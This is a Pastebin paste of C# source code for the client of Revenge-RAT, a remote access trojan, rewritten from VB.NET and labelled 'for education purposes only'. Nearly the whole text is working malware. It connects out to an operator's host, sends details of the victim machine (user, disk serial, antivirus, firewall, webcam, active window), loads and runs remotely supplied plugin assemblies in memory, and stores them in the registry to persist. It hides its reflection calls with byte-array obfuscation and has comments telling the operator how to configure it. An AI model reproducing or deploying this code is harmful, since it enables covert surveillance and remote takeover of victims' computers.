API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 17th, 2019
472
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.83 KB | None | 0 0
raw download clone embed print report
  1.  
  2. //Revenge-RAT Client Source Code v0.3 Rewritten in C# By MiraculousDZ
  3. //Original Author (VB.NET): N A P O L E O N
  4. //FB:MiraculousDZ == Skype:live:miraculous_dz_1
  5. //Last edit: 2017/04/20
  6. //To use for education purposes only
  7. //Thanks To : N A P O L E O N == THE MYSTERIES LEGACY == Grandfather's Legacy
  8.  
  9. using Microsoft.VisualBasic;
  10. using Microsoft.VisualBasic.Devices;
  11. using Microsoft.Win32;
  12. using System;
  13. using System.Collections;
  14. using System.Collections.Generic;
  15. using System.Data;
  16. using System.Diagnostics;
  17. using System.Globalization;
  18. using System.IO;
  19. using System.IO.Compression;
  20. using System.Management;
  21. using System.Net;
  22. using System.Net.Sockets;
  23. using System.Reflection;
  24. using System.Runtime.InteropServices;
  25. using System.Text;
  26. using System.Threading;
  27. using System.Windows.Forms;
  28.  
  29. namespace Miraculous_DZ
  30. {
  31. public static class Class1
  32. {
  33.  
  34. #region Fields Definition
  35. public static bool ZE = false;
  36. public static TcpClient TC = null;
  37. public static bool CZ = false;
  38. public static int PING = 1;
  39. public static int PONG = 0;
  40. public static string RE = "1500"; //Replace %RE% for reconnect time in ms like 1500 or 2000
  41. public static string[] HOST = Strings.Split(",", ",", -1, Microsoft.VisualBasic.CompareMethod.Text); //Replace "%H%" with you host == you must add "," after all host ! == like this "127.0.0.1,"
  42. public static string[] PORT = Strings.Split(",", ",", -1, Microsoft.VisualBasic.CompareMethod.Text); //Replace "%P%" with you port == you must add "," after all port ! == like this "92,"
  43. public static string ID = ""; //Replace "%ID%" with your identification encoded in base64 UTF-8 like "Q2xpZW50"
  44. public static string XMUT = "%MUT%"; //Mutex:RunOnce
  45. public static string KEY = ""; //Replace "%Socket Key%" with your Socket Key
  46. public static int H = 0;
  47. public static int P = 0;
  48. public static string App = Application.ExecutablePath;
  49. public static ComputerInfo CI = new ComputerInfo();
  50. public static Mutex MUT;
  51. public static string SPL = "*-]NK[-*";
  52. #endregion
  53.  
  54. #region Main
  55.  
  56. [STAThread]
  57. public static void Main()
  58. {
  59. GO();
  60. }
  61. public static void GO()
  62. {
  63. new Thread(new ThreadStart(RC), 1).Start();
  64. new Thread(new ThreadStart(PIP)).Start();
  65. } //Connect
  66. public static void PIP()
  67. {
  68. DR:
  69. if (PING == 0)
  70. {
  71. PONG += 1;
  72. }
  73. Thread.Sleep(1);
  74. goto DR;
  75. } //Ping Client
  76. public static void INS()
  77. {
  78. Thread.Sleep(9000);
  79. try
  80. {
  81. MUT = new Mutex(true, XMUT, out ZE);
  82. if (!ZE)
  83. {
  84. System.Environment.Exit(0);
  85. MUT.ReleaseMutex();
  86. }
  87. }
  88. catch
  89. {
  90. }
  91. } //Client Install
  92. public static void Data(byte[] BB) //Receive Data from Server
  93. {
  94.  
  95. string[] DZ = Strings.Split(BS(BB), KEY, -1, Microsoft.VisualBasic.CompareMethod.Text);
  96. if (DZ[0] == "PNC")
  97. {
  98. PING = 0;
  99. Send("PNC");
  100. }
  101. else if (DZ[0] == "P")
  102. {
  103. PING = 1;
  104. Send("P" + KEY + PONG);
  105. PONG = 0;
  106. Send("W" + KEY + GAW());
  107. }
  108. else if (DZ[0] == "IE") //Ask about plugin
  109. {
  110. if ((Registry.CurrentUser.OpenSubKey("Software\\" + Encode(XMUT) + "\\" + DZ[1], true) != null))
  111. {
  112. try
  113. {
  114. INV(HOST[H], PORT[P], DZ[4], DZ[5], Encode(Decode(ID) + "_" + DWF()), Registry.GetValue(@"HKEY_CURRENT_USER\SOFTWARE\" + Encode(XMUT) + @"\\" + DZ[1], DZ[1], null).ToString(), int.Parse(DZ[2]), System.Convert.ToBoolean(DZ[3]), DZ[1], true);
  115. }
  116. catch
  117. {
  118. Send("GPL" + KEY + DZ[5] + KEY + DZ[1] + KEY + "false");
  119. }
  120. }
  121. else
  122. {
  123. Send("GPL" + KEY + DZ[5] + KEY + DZ[1] + KEY + "false");
  124. }
  125. }
  126. else if (DZ[0] == "LP") //invoke plugin
  127. {
  128. INV(HOST[H], PORT[P], DZ[1], DZ[2], Encode(Decode(ID) + "_" + DWF()), DZ[3], int.Parse(DZ[4]), System.Convert.ToBoolean(DZ[5]), DZ[6], Convert.ToBoolean(DZ[7]));
  129. }
  130. else if (DZ[0] == "UNV") //uninstall - restart - close .. etc
  131. {
  132. object ar = Interaction.CallByName(LA(DZ[1]), System.Text.Encoding.Default.GetString(new byte[] { 71, 101, 116, 84, 121, 112, 101 }), CallType.Method, DZ[2]);
  133. object enn = Interaction.CallByName(ar, System.Text.Encoding.Default.GetString(new byte[] { 71, 101, 116, 77, 101, 116, 104, 111, 100 }), CallType.Method, System.Text.Encoding.Default.GetString(new byte[] { 85, 78, 73 }));
  134. object inn = Interaction.CallByName(enn, System.Text.Encoding.Default.GetString(new byte[] { 73, 110, 118, 111, 107, 101 }), CallType.Method, null, new object[] { Encode(XMUT), DZ[3], null, null, null, null, null, null, null, null,
  135. null, null, null, null, null, null, null, null, null, null,
  136. null, null, null, null, null, null, null, null, null, null,
  137. null, null, DZ[4], DZ[5], App, DZ[6], DZ[7], DZ[8], DZ[9], DZ[10],
  138. DZ[11], DZ[12], DZ[13]});
  139.  
  140. }
  141. }
  142. #endregion
  143.  
  144. #region Plugins
  145. public static void INV(string H, string P, string N, string C, string ID, string Bytes, int S, bool M, string MD5, bool B) //invoke plugin function
  146. {
  147. byte[] ci = new byte[] { 67, 114, 101, 97, 116, 101, 73, 110, 115, 116, 97, 110, 99, 101 };
  148. byte[] gem = new byte[] { 71, 101, 116, 77, 101, 116, 104, 111, 100 };
  149. byte[] invo = new byte[] { 73, 110, 118, 111, 107, 101 };
  150. byte[] vod = new byte[] { 83, 116, 97, 114, 116 };
  151. object ar = Interaction.CallByName(LA(Bytes), System.Text.Encoding.Default.GetString(ci), CallType.Method, N + "." + C);
  152. object inn = Interaction.CallByName(ar, System.Text.Encoding.Default.GetString(vod), CallType.Method, new object[] { ID, S, H, P, KEY, SPL });
  153. if (M)
  154. {
  155. try
  156. {
  157. if (Registry.CurrentUser.OpenSubKey("Software\\" + Encode(XMUT) + "\\" + MD5, true) == null)
  158. {
  159. IR("HKEY_CURRENT_USER\\SOFTWARE\\" + Encode(XMUT) + "\\" + MD5, MD5, Bytes);
  160. }
  161. }
  162. catch
  163. {
  164. }
  165. if (B == false)
  166. {
  167. IR("HKEY_CURRENT_USER\\SOFTWARE\\" + Encode(XMUT) + "\\" + MD5, MD5, Bytes);
  168. }
  169. }
  170. }
  171. public static object LA(string B) //load assembly
  172. {
  173. byte[] lod = new byte[] { 76, 111, 97, 100 };
  174. Object ap = System.AppDomain.CurrentDomain;
  175. return Interaction.CallByName(ap, System.Text.Encoding.Default.GetString(lod), CallType.Method, Decompress(Convert.FromBase64String(B)));
  176. }
  177. public static void IR(string P, string N, string B) //add reg value
  178. {
  179. try
  180. {
  181.  
  182. Registry.SetValue(P, N, B);
  183. }
  184. catch
  185. {
  186. }
  187. }
  188. #endregion
  189.  
  190. #region Functions
  191. public static string IP() //Get internal IP
  192. {
  193. try
  194. {
  195. return ((IPAddress)Dns.GetHostByName(Dns.GetHostName()).AddressList.GetValue(0)).ToString();
  196. }
  197. catch
  198. {
  199. return "????";
  200. }
  201. }
  202. public static string DWF() //Get Hard Disk Serial Number
  203. {
  204. try
  205. {
  206. string trt = Interaction.Environ("SystemDrive") + "\\";
  207. string trrt = null;
  208. int trtt = 0;
  209. int tyt = 0;
  210. int tytr = 0;
  211. string trrtr = null;
  212. int number = 0;
  213. GVI(trt, trrt, trtt, ref number, ref tyt, ref tytr, trrtr, 0);
  214. return Conversion.Hex(number);
  215. }
  216. catch
  217. {
  218. return "ERR";
  219. }
  220. }
  221. public static string CIVC()
  222. {
  223. string hh = null;
  224. string hhh = Strings.Space(100);
  225. try
  226. {
  227. for (int i = 0; i <= 4; i++)
  228. {
  229. if (CAWP((short)i, hhh, 100, hh, 100))
  230. {
  231. return "Yes";
  232. }
  233. }
  234. }
  235. catch
  236. {
  237. }
  238. return "No";
  239. } //Check Camera return yes or no
  240. public static string OP()
  241. {
  242. try
  243. {
  244. foreach (ManagementObject SC in new ManagementObjectSearcher("select * from Win32_Processor").Get())
  245. {
  246. return Convert.ToInt32(SC["AddressWidth"]).ToString();
  247. }
  248. }
  249. catch
  250. {
  251. return "????";
  252. }
  253. return "????";
  254.  
  255. } //Get operation system 32 or 64 bit
  256. public static string GPRO(string Product) //Get Product via ManagementObjectSearcher
  257. {
  258. try
  259. {
  260. string PN = string.Empty;
  261. foreach (ManagementObject AV in new ManagementObjectSearcher("root\\SecurityCenter" + (CI.OSFullName.Contains("XP") ? "" : "2").ToString(), Product).Get())
  262. {
  263. PN += AV["displayName"];
  264. }
  265. if ((PN != string.Empty))
  266. {
  267. return Encode(PN);
  268. }
  269. else
  270. {
  271. return Encode("N/A");
  272. }
  273. }
  274. catch
  275. {
  276. return Encode("N/A");
  277. }
  278. }
  279. public static string MP()
  280. {
  281. try
  282. {
  283. return Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null).ToString();
  284. }
  285. catch
  286. {
  287. return "????";
  288. }
  289. } // Get CPU
  290. public static string GAW()
  291. {
  292. StringBuilder W = new StringBuilder(256);
  293. GetWindowText(GFW(), W, W.Capacity);
  294. return Encode(W.ToString());
  295. } //Get Active Window
  296. #endregion
  297.  
  298. #region Network
  299. public static void RC() //Handling Incoming Data
  300. {
  301.  
  302. MemoryStream M = new MemoryStream();
  303. int lp = 0;
  304. re:
  305. try
  306. {
  307. try
  308. {
  309. EmptyWorkingSet(Process.GetCurrentProcess().Handle); //Reduce memory versus performance
  310. }
  311. catch
  312. {
  313. }
  314. }
  315. catch
  316. {
  317. }
  318. try
  319. {
  320. if (TC == null)
  321. goto e;
  322. if (TC.Client.Connected == false)
  323. goto e;
  324. if (CZ == false)
  325. goto e;
  326. lp += 1;
  327. if (lp > 150)
  328. {
  329. lp = 0;
  330. if (TC.Client.Poll(-1, System.Net.Sockets.SelectMode.SelectRead) & TC.Client.Available <= 0)
  331. goto e;
  332. }
  333. if (TC.Available > 0)
  334. {
  335. byte[] B = new byte[TC.Available];
  336. TC.Client.Receive(B, 0, B.Length, System.Net.Sockets.SocketFlags.None);
  337. M.Write(B, 0, B.Length);
  338. rr:
  339. if (BS(M.ToArray()).Contains(SPL))
  340. {
  341. Array[] A = (Array[])(fx(M.ToArray(), SPL));
  342. Thread t = new Thread(delegate() { Data((byte[])A[0]); });
  343. t.Start();
  344. M.Dispose();
  345.  
  346. M = new System.IO.MemoryStream();
  347. if (A.Length == 2)
  348. {
  349. M.Write((byte[])(A[1]), 0, ((byte[])(A[1])).Length);
  350. goto rr;
  351. }
  352. }
  353. }
  354. }
  355. catch
  356. {
  357. goto e;
  358. }
  359. Thread.Sleep(1);
  360. goto re;
  361. e:
  362. try
  363. {
  364. try
  365. {
  366. EmptyWorkingSet(Process.GetCurrentProcess().Handle);
  367. }
  368. catch
  369. {
  370. }
  371. }
  372. catch
  373. {
  374. }
  375. CZ = false;
  376. try
  377. {
  378. TC.Client.Disconnect(false);
  379. }
  380. catch
  381. {
  382. }
  383. try
  384. {
  385. M.Dispose();
  386. }
  387. catch
  388. {
  389. }
  390. M = new MemoryStream();
  391. bool IC = false;
  392. for (int Count = 0; Count <= HOST.Length - 2; Count++)
  393. {
  394. try
  395. {
  396. TC = new TcpClient();
  397. {
  398. TC.ReceiveTimeout = -1;
  399. TC.SendTimeout = -1;
  400. TC.SendBufferSize = 999999;
  401. TC.ReceiveBufferSize = 999999;
  402. }
  403. lp = 0;
  404. TC.Client.Connect(HOST[Count], Convert.ToInt16(PORT[Count]));
  405. CZ = true;
  406. Send("Information" + KEY + ID + KEY + Encode("_" + DWF()) + KEY + IP() + KEY + Encode(Environment.MachineName + " / " + Environment.UserName) + KEY + CIVC() + KEY + Encode(CI.OSFullName + " " + OP()) + KEY + Encode(MP()) + KEY + CI.TotalPhysicalMemory + KEY + GPRO("Select * from AntiVirusProduct") + KEY + GPRO("SELECT * FROM FirewallProduct") + KEY + PORT[P] + KEY + GAW() + KEY + Encode(CultureInfo.CurrentCulture.Name) + KEY + @"RVUS"); // RVUS for make this client special color in lv , true for spread , RVUS for you , and false mean this client didn't come from spread
  407. H = Count;
  408. P = Count;
  409. IC = true;
  410. goto re;
  411. }
  412. catch
  413. {
  414. Thread.Sleep(int.Parse(RE));
  415. H = 0;
  416. P = 0;
  417. }
  418. }
  419. if (IC == true)
  420. {
  421. IC = false;
  422. goto e;
  423. }
  424. goto re;
  425. }
  426. public static void Send(byte[] b) //Send Data
  427. {
  428. if (CZ == false)
  429. return;
  430. try
  431. {
  432. MemoryStream r = new MemoryStream();
  433. r.Write(b, 0, b.Length);
  434. r.Write(SB(SPL), 0, SPL.Length);
  435. TC.Client.SendBufferSize = b.Length;
  436. TC.Client.Poll(-1, System.Net.Sockets.SelectMode.SelectWrite);
  437. TC.Client.Send(r.ToArray(), 0, checked((int)r.Length), System.Net.Sockets.SocketFlags.None);
  438. r.Dispose();
  439. }
  440. catch
  441. {
  442. CZ = false;
  443. }
  444. }
  445. public static void Send(string S) //Send Data
  446. {
  447. Send(SB(S));
  448. }
  449. #endregion
  450.  
  451. #region Encoding
  452. public static byte[] SB(string s)
  453. {
  454. return Encoding.Default.GetBytes(s);
  455. } // String to Byte
  456. public static string BS(byte[] b)
  457. {
  458. return Encoding.Default.GetString(b);
  459. } // Byte to String
  460. public static Array fx(byte[] b, string WRD)
  461. {
  462. List<byte[]> a = new List<byte[]>();
  463. MemoryStream M = new MemoryStream();
  464. MemoryStream MM = new MemoryStream();
  465. string[] T = Strings.Split(BS(b), WRD, -1, Microsoft.VisualBasic.CompareMethod.Text);
  466. M.Write(b, 0, T[0].Length);
  467. MM.Write(b, T[0].Length + WRD.Length, b.Length - (T[0].Length + WRD.Length));
  468. a.Add(M.ToArray());
  469. a.Add(MM.ToArray());
  470. M.Dispose();
  471. MM.Dispose();
  472. return (a.ToArray());
  473. } // fix incomming Data(bytes)
  474. public static byte[] Decompress(byte[] B) // Decompress Bytes with GZipStream
  475. {
  476. MemoryStream ms = new MemoryStream(B);
  477. GZipStream gzipStream = new GZipStream((Stream)ms, CompressionMode.Decompress);
  478. byte[] buffer = new byte[4];
  479. ms.Position = checked(ms.Length - 5L);
  480. ms.Read(buffer, 0, 4);
  481. int count = BitConverter.ToInt32(buffer, 0);
  482. ms.Position = 0L;
  483. byte[] AR = new byte[checked(count - 1 + 1)];
  484. gzipStream.Read(AR, 0, count);
  485. gzipStream.Dispose();
  486. ms.Dispose();
  487. return AR;
  488. }
  489. public static string Encode(string str)
  490. {
  491. return Convert.ToBase64String(Encoding.UTF8.GetBytes(str));
  492. } // Encode string UTF-8
  493. public static string Decode(string str)
  494. {
  495. return Encoding.UTF8.GetString(Convert.FromBase64String(str));
  496. } // Decode string UTF-8
  497. #endregion
  498.  
  499. #region PInvokes
  500.  
  501. [DllImport("kernel32", EntryPoint = "GetVolumeInformationA", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  502. private static extern int GVI(string IP, string V, int T, ref int H, ref int Q, ref int G, string J, int X);
  503. [DllImport("user32", EntryPoint = "GetForegroundWindow", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  504. private static extern IntPtr GFW();
  505. [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  506. static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
  507. [DllImport("avicap32.dll", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  508. public static extern bool CAWP(short wDriver, string lpszName, int cbName, string lpszVer, int cbVer);
  509. [DllImport("psapi")]
  510. public static extern bool EmptyWorkingSet(IntPtr hProcess);
  511.  
  512. #endregion
  513. }
  514. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!